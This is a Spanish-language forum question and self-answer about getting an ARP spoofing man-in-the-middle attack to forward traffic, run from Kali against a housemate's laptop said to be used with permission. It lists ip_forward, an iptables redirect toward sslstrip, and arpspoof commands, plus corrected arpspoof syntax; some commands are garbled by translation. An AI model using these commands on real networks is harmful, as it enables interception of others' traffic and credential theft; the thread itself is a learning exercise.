Arp Spoofing causando conexiones caídas

3

Hoy he tenido una conferencia basada en Arp Spoofing. Sin embargo, no puedo hacerlo funcionar.

Escenario:

Mi laptop - ejecutando kali

Computadora portátil de destino (housemate - con permiso) - ejecutando Windows 8

Comandos ingresados en orden:

  1. echo 1 > / proc / sys / net / ipv4 / ip_forward
  2. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECTA - to-port 1024
  3. arpspoof -i wlan0 -t 192.168.0.1 192.168.0.9
  4. arpspoof -i wlan0 -t 192.168.0.9 192.168.0.1

Sin embargo, al completar estos comandos, la conexión en la máquina de destino se pierde y no pueden acceder a ninguna página web.

Después de intentar resolver esto por mí mismo, ejecuté Wireshark y noté que la conexión es la siguiente:

Destino > host > sitio web > host - PARADA AQUÍ.

Estoy luchando para entender por qué el tráfico no se reenvía al destino cuando lo habilito.

He intentado habilitar un programa de escucha en el puerto (sslstrip) para ver si ese era el problema, pero esto causa el mismo problema.

EDITAR: Los comandos 3 y 4 se ejecutaron en terminales separados

    
pregunta Dr.Pepper 10.02.2015 - 15:25
fuente

1 respuesta

1

Ya he resuelto esto.

Arpspoof ha cambiado a la versión 2.4 desde que se escribieron los tutoriales que estaba leyendo.

Eliminé la entrada de IPTABLES.

Cambié los comandos 3 y 4 a lo siguiente:

  1. arpspoof -i wlan0 -t 192.168.0.9 -r 192.168.0.1
  2. arpspoof -i wlan0 -t 192.168.0.1 192.168.0.9

(Observe el cambio en el orden y la adición de la marca -r)

    
respondido por el Dr.Pepper 10.02.2015 - 16:14
fuente

Lea otras preguntas en las etiquetas